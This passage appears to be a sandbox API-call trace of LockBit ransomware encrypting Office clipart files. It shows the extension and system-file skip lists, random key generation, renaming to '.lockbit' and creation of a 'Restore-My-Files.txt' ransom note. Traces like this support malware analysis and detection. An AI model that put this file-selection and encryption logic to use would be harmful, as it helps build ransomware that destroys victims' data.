[0162.631] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.631] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01356_.WMF.lockbit") returned 72 [0162.632] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01356_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01356_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.633] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.633] malloc (_Size=0x40068) returned 0x3df0008 [0162.633] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18226) returned 1 [0162.633] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.633] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.633] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.634] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.634] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.733] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01356_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01356_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.733] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.733] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0162.733] free (_Block=0x1fa2ed8) [0162.733] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01356_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.733] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.733] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.733] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdda5200, ftCreationTime.dwHighDateTime=0x1bd4b3c, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcdda5200, ftLastWriteTime.dwHighDateTime=0x1bd4b3c, nFileSizeHigh=0x0, nFileSizeLow=0x6bf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01357_.WMF", cAlternateFileName="")) returned 1 [0162.733] lstrcmpiW (lpString1=".", lpString2="NA01357_.WMF") returned -1 [0162.733] lstrcmpiW (lpString1="..", lpString2="NA01357_.WMF") returned -1 [0162.733] PathFindExtensionW (pszPath="NA01357_.WMF") returned=".WMF" [0162.733] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.734] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.734] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01357_.WMF") returned 1 [0162.735] lstrcmpiW (lpString1="ntldr", lpString2="NA01357_.WMF") returned 1 [0162.735] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01357_.WMF") returned 1 [0162.735] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01357_.WMF") returned -1 [0162.735] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01357_.WMF") returned -1 [0162.735] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01357_.WMF") returned 1 [0162.735] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01357_.WMF") returned -1 [0162.735] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.735] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01357_.WMF") returned=".WMF" [0162.735] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.735] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.736] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.736] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.736] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01357_.WMF.lockbit") returned 72 [0162.737] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01357_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01357_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.738] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.738] malloc (_Size=0x40068) returned 0x3df0008 [0162.738] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=27638) returned 1 [0162.738] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.738] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.739] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.739] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.740] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01357_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01357_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.740] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.740] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.742] free (_Block=0x1fa2ed8) [0162.742] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01357_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.742] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.742] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.742] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca92500, ftCreationTime.dwHighDateTime=0x1bd4b3c, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcca92500, ftLastWriteTime.dwHighDateTime=0x1bd4b3c, nFileSizeHigh=0x0, nFileSizeLow=0xd6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01358_.WMF", cAlternateFileName="")) returned 1 [0162.742] lstrcmpiW (lpString1=".", lpString2="NA01358_.WMF") returned -1 [0162.742] lstrcmpiW (lpString1="..", lpString2="NA01358_.WMF") returned -1 [0162.742] PathFindExtensionW (pszPath="NA01358_.WMF") returned=".WMF" [0162.742] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.742] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.743] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.743] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01358_.WMF") returned 1 [0162.743] lstrcmpiW (lpString1="ntldr", lpString2="NA01358_.WMF") returned 1 [0162.744] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01358_.WMF") returned 1 [0162.744] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01358_.WMF") returned -1 [0162.744] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01358_.WMF") returned -1 [0162.744] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01358_.WMF") returned 1 [0162.744] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01358_.WMF") returned -1 [0162.744] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.744] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01358_.WMF") returned=".WMF" [0162.744] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.744] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.744] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.745] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.745] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.745] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.745] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.745] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01358_.WMF.lockbit") returned 72 [0162.745] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01358_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01358_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0162.748] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.749] malloc (_Size=0x40068) returned 0x1ff1e60 [0162.749] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3438) returned 1 [0162.749] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.749] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0162.749] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.749] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0162.749] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.751] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01358_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01358_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.751] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.751] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.752] free (_Block=0x1fa2ed8) [0162.752] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01358_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.752] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.752] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.752] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6b34400, ftCreationTime.dwHighDateTime=0x1bd4b3c, ftLastAccessTime.dwLowDateTime=0x6a370b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6b34400, ftLastWriteTime.dwHighDateTime=0x1bd4b3c, nFileSizeHigh=0x0, nFileSizeLow=0x1b74, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01361_.WMF", cAlternateFileName="")) returned 1 [0162.753] lstrcmpiW (lpString1=".", lpString2="NA01361_.WMF") returned -1 [0162.753] lstrcmpiW (lpString1="..", lpString2="NA01361_.WMF") returned -1 [0162.753] PathFindExtensionW (pszPath="NA01361_.WMF") returned=".WMF" [0162.753] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW 